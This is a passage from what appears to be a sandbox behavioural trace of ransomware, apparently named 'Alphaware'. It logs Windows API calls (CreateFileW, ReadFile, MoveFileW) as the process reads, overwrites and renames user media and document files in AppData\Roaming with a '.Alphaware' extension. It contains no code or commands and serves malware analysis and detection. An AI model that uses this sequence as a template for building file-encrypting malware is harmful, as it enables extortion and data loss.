dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0090.785] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0090.785] ReadFile (in: hFile=0x250, lpBuffer=0x12932898, nNumberOfBytesToRead=0x15944, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x12932898*, lpNumberOfBytesRead=0x23eb38*=0x15944, lpOverlapped=0x0) returned 1 [0090.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0090.822] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\lKBIj-DLGhLH.m4a" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\lkbij-dlghlh.m4a"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0090.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0090.828] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0090.828] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\lKBIj-DLGhLH.m4a" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\lkbij-dlghlh.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x112bcfa0, ftCreationTime.dwHighDateTime=0x1d96eff, ftLastAccessTime.dwLowDateTime=0x6e2e85a0, ftLastAccessTime.dwHighDateTime=0x1d9701f, ftLastWriteTime.dwLowDateTime=0x88546520, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1cd34)) returned 1 [0090.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0090.828] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\lKBIj-DLGhLH.m4a" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\lkbij-dlghlh.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\lKBIj-DLGhLH.m4a.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\lkbij-dlghlh.m4a.alphaware")) returned 1 [0090.830] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\NbYVLogs.m4a", dwFileAttributes=0x80) returned 1 [0090.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0090.830] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\NbYVLogs.m4a" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\nbyvlogs.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23fab90 | out: lpFileInformation=0x23fab90*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x43607cb0, ftCreationTime.dwHighDateTime=0x1d970a2, ftLastAccessTime.dwLowDateTime=0xa419cf40, ftLastAccessTime.dwHighDateTime=0x1d97479, ftLastWriteTime.dwLowDateTime=0xa419cf40, ftLastWriteTime.dwHighDateTime=0x1d97479, nFileSizeHigh=0x0, nFileSizeLow=0x1810c)) returned 1 [0090.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0090.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0090.831] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\NbYVLogs.m4a" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\nbyvlogs.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0090.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0090.831] ReadFile (in: hFile=0x250, lpBuffer=0x1271fe98, nNumberOfBytesToRead=0x1810c, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x1271fe98*, lpNumberOfBytesRead=0x23eb38*=0x1810c, lpOverlapped=0x0) returned 1 [0090.860] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0090.860] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\NbYVLogs.m4a" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\nbyvlogs.m4a"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0090.862] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0090.866] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0090.866] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\NbYVLogs.m4a" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\nbyvlogs.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43607cb0, ftCreationTime.dwHighDateTime=0x1d970a2, ftLastAccessTime.dwLowDateTime=0xa419cf40, ftLastAccessTime.dwHighDateTime=0x1d97479, ftLastWriteTime.dwLowDateTime=0x885b8940, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x20234)) returned 1 [0090.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0090.866] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\NbYVLogs.m4a" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\nbyvlogs.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\NbYVLogs.m4a.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\nbyvlogs.m4a.alphaware")) returned 1 [0090.867] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\N_rlN0Z3nRhZqdxj JZI.rtf", dwFileAttributes=0x80) returned 1 [0090.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0090.868] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\N_rlN0Z3nRhZqdxj JZI.rtf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\n_rln0z3nrhzqdxj jzi.rtf"), fInfoLevelId=0x0, lpFileInformation=0x24790a8 | out: lpFileInformation=0x24790a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe08ef420, ftCreationTime.dwHighDateTime=0x1d96f1d, ftLastAccessTime.dwLowDateTime=0x9c844920, ftLastAccessTime.dwHighDateTime=0x1d972e6, ftLastWriteTime.dwLowDateTime=0x9c844920, ftLastWriteTime.dwHighDateTime=0x1d972e6, nFileSizeHigh=0x0, nFileSizeLow=0x29be)) returned 1 [0090.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0090.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0090.868] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\N_rlN0Z3nRhZqdxj JZI.rtf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\n_rln0z3nrhzqdxj jzi.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0090.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0090.868] ReadFile (in: hFile=0x250, lpBuffer=0x2479350, nNumberOfBytesToRead=0x29be, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2479350*, lpNumberOfBytesRead=0x23eb38*=0x29be, lpOverlapped=0x0) returned 1 [0090.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0090.892] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\N_rlN0Z3nRhZqdxj JZI.rtf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\n_rln0z3nrhzqdxj jzi.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0090.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0090.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0090.904] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\N_rlN0Z3nRhZqdxj JZI.rtf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\n_rln0z3nrhzqdxj jzi.rtf"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe08ef420, ftCreationTime.dwHighDateTime=0x1d96f1d, ftLastAccessTime.dwLowDateTime=0x9c844920, ftLastAccessTime.dwHighDateTime=0x1d972e6, ftLastWriteTime.dwLowDateTime=0x8862ad60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3874)) returned 1 [0090.905] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0090.905] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\N_rlN0Z3nRhZqdxj JZI.rtf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\n_rln0z3nrhzqdxj jzi.rtf"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\N_rlN0Z3nRhZqdxj JZI.rtf.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\n_rln0z3nrhzqdxj jzi.rtf.alphaware")) returned 1 [0090.906] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ObWS3XW5aMy2t2Z9HK.wav", dwFileAttributes=0x80) returned 1 [0090.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0090.906] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ObWS3XW5aMy2t2Z9HK.wav" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\obws3xw5amy2t2z9hk.wav"), fInfoLevelId=0x0, lpFileInformation=0x2515778 | out: lpFileInformation=0x2515778*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xab045dc0, ftCreationTime.dwHighDateTime=0x1d96fc9, ftLastAccessTime.dwLowDateTime=0x334e8d50, ftLastAccessTime.dwHighDateTime=0x1d97497, ftLastWriteTime.dwLowDateTime=0x334e8d50, ftLastWriteTime.dwHighDateTime=0x1d97497, nFileSizeHigh=0x0, nFileSizeLow=0xc06e)) returned 1 [0090.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0090.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0090.906] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ObWS3XW5aMy2t2Z9HK.wav" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\obws3xw5amy2t2z9hk.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0090.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0090.907] ReadFile (in: hFile=0x250, lpBuffer=0x2515a10, nNumberOfBytesToRead=0xc06e, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2515a10*, lpNumberOfBytesRead=0x23eb38*=0xc06e, lpOverlapped=0x0) returned 1 [0090.941] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0090.941] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ObWS3XW5aMy2t2Z9HK.wav" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\obws3xw5amy2t2z9hk.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0090.943] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0090.946] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0090.946] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ObWS3XW5aMy2t2Z9HK.wav" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\obws3xw5amy2t2z9hk.wav"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab045dc0, ftCreationTime.dwHighDateTime=0x1d96fc9, ftLastAccessTime.dwLowDateTime=0x334e8d50, ftLastAccessTime.dwHighDateTime=0x1d97497, ftLastWriteTime.dwLowDateTime=0x88677020, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x10160)) returned 1 [0090.946] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0090.946] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ObWS3XW5aMy2t2Z9HK.wav" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\obws3xw5amy2t2z9hk.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ObWS3XW5aMy2t2Z9HK.wav.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\obws3xw5amy2t2z9hk.wav.alphaware")) returned 1 [0090.947] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\PpTfQfUJeEHeOaQm.bmp", dwFileAttributes=0x80) returned 1 [0090.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0090.947] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\PpTfQfUJeEHeOaQm.bmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\pptfqfujeeheoaqm.bmp"), fInfoLevelId=0x0, lpFileInformation=0x2461cd0 | out: lpFileInformation=0x2461cd0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4b7ed130, ftCreationTime.dwHighDateTime=0x1d96cab, ftLastAccessTime.dwLowDateTime=0x55987f50, ftLastAccessTime.dwHighDateTime=0x1d96d7c, ftLastWriteTime.dwLowDateTime=0x55987f50, ftLastWriteTime.dwHighDateTime=0x1d96d7c, nFileSizeHigh=0x0, nFileSizeLow=0x35dc)) returned 1 [0090.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0090.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0090.948] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\PpTfQfUJeEHeOaQm.bmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\pptfqfujeeheoaqm.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0090.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0090.948] ReadFile (in: hFile=0x250, lpBuffer=0x2461f58, nNumberOfBytesToRead=0x35dc, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2461f58*, lpNumberOfBytesRead=0x23eb38*=0x35dc, lpOverlapped=0x0) returned 1 [0090.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0090.971] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\PpTfQfUJeEHeOaQm.bmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\pptfqfujeeheoaqm.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0090.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0090.974] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0090.974] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\PpTfQfUJeEHeOaQm.bmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\pptfqfujeeheoaqm.bmp"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b7ed130, ftCreationTime.dwHighDateTime=0x1d96cab, ftLastAccessTime.dwLowDateTime=0x55987f50, ftLastAccessTime.dwHighDateTime=0x1d96d7c, ftLastWriteTime.dwLowDateTime=0x886c32e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x48a0)) returned 1 [0090.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0090.975] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\PpTfQfUJeEHeOaQm.bmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\pptfqfujeeheoaqm.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\PpTfQfUJeEHeOaQm.bmp.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\pptfqfujeeheoaqm.bmp.alphaware")) returned 1 [0090.976] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\pPz0ItX4f1x.avi", dwFileAttributes=0x80) returned 1 [0090.976] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0090.976] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\pPz0ItX4f1x.avi" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\ppz0itx4f1x.avi"), fInfoLevelId=0x0, lpFileInformation=0x2506540 | out: lpFileInformation=0x2506540*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfa540c80, ftCreationTime.dwHighDateTime=0x1d9722c, ftLastAccessTime.dwLowDateTime=0xd845e210, ftLastAccessTime.dwHighDateTime=0x1d97404, ftLastWriteTime.dwLowDateTime=0xd845e210, ftLastWriteTime.dwHighDateTime=0x1d97404, nFileSizeHigh=0x0, nFileSizeLow=0x7841)) returned 1 [0090.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0090.976] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0090.976] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\pPz0ItX4f1x.avi" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\ppz0itx4f1x.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0090.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0090.976] ReadFile (in: hFile=0x250, lpBuffer=0x2506798, nNumberOfBytesToRead=0x7841, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2506798*, lpNumberOfBytesRead=0x23eb38*=0x7841, lpOverlapped=0x0) returned 1 [0091.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0091.001] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\pPz0ItX4f1x.avi" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\ppz0itx4f1x.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0091.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0091.007] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0091.007] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\pPz0ItX4f1x.avi" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\ppz0itx4f1x.avi"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa540c80, ftCreationTime.dwHighDateTime=0x1d9722c, ftLastAccessTime.dwLowDateTime=0xd845e210, ftLastAccessTime.dwHighDateTime=0x1d97404, ftLastWriteTime.dwLowDateTime=0x8870f5a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xa134)) returned 1 [0091.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0091.007] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\pPz0ItX4f1x.avi" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\ppz0itx4f1x.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\pPz0ItX4f1x.avi.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\ppz0itx4f1x.avi.alphaware")) returned 1 [0091.008] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\PUZ1Gae4SGu.mp3", dwFileAttributes=0x80) returned 1 [0091.009] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0091.009] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\PUZ1Gae4SGu.mp3" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\puz1gae4sgu.mp3"), fInfoLevelId=0x0, lpFileInformation=0x23ea0d8 | out: lpFileInformation=0x23ea0d8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1c7d7730, ftCreationTime.dwHighDateTime=0x1d972b2, ftLastAccessTime.dwLowDateTime=0xf5008f20, ftLastAccessTime.dwHighDateTime=0x1d97523, ftLastWriteTime.dwLowDateTime=0xf5008f20, ftLastWriteTime.dwHighDateTime=0x1d97523, nFileSizeHigh=0x0, nFileSizeLow=0x1603c)) returned 1 [0091.009] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0091.009] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0091.009] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\PUZ1Gae4SGu.mp3" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\puz1gae4sgu.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0091.009] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0091.009] ReadFile (in: hFile=0x250, lpBuffer=0x128892f8, nNumberOfBytesToRead=0x1603c, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x128892f8*, lpNumberOfBytesRead=0x23eb38*=0x1603c, lpOverlapped=0x0) returned 1 [0091.036] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0091.036] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\PUZ1Gae4SGu.mp3" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\puz1gae4sgu.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0091.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0091.042] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0091.042] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\PUZ1Gae4SGu.mp3" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\puz1gae4sgu.mp3"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c7d7730, ftCreationTime.dwHighDateTime=0x1d972b2, ftLastAccessTime.dwLowDateTime=0xf5008f20, ftLastAccessTime.dwHighDateTime=0x1d97523, ftLastWriteTime.dwLowDateTime=0x8875b860, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1d674)) returned 1 [0091.042] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0091.042] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\PUZ1Gae4SGu.mp3" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\puz1gae4sgu.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\PUZ1Gae4SGu.mp3.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\puz1gae4sgu.mp3.alphaware")) returned 1 [0091.043] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\rKqcydSq.mkv", dwFileAttributes=0x80) returned 1 [0091.043] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0091.043] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\rKqcydSq.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\rkqcydsq.mkv"), fInfoLevelId=0x0, lpFileInformation=0x2468370 | out: lpFileInformation=0x2468370*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x324af9c0, ftCreationTime.dwHighDateTime=0x1d97307, ftLastAccessTime.dwLowDateTime=0xd4993220, ftLastAccessTime.dwHighDateTime=0x1d97422, ftLastWriteTime.dwLowDateTime=0xd4993220, ftLastWriteTime.dwHighDateTime=0x1d97422, nFileSizeHigh=0x0, nFileSizeLow=0x6424)) returned 1 [0091.044] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0091.044] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0091.044] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\rKqcydSq.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\rkqcydsq.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0091.044] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0091.044] ReadFile (in: hFile=0x250, lpBuffer=0x24685b8, nNumberOfBytesToRead=0x6424, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x24685b8*, lpNumberOfBytesRead=0x23eb38*=0x6424, lpOverlapped=0x0) returned 1 [0091.066] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0091.066] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\rKqcydSq.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\rkqcydsq.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0091.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0091.070] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0091.070] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\rKqcydSq.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\rkqcydsq.mkv"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324af9c0, ftCreationTime.dwHighDateTime=0x1d97307, ftLastAccessTime.dwLowDateTime=0xd4993220, 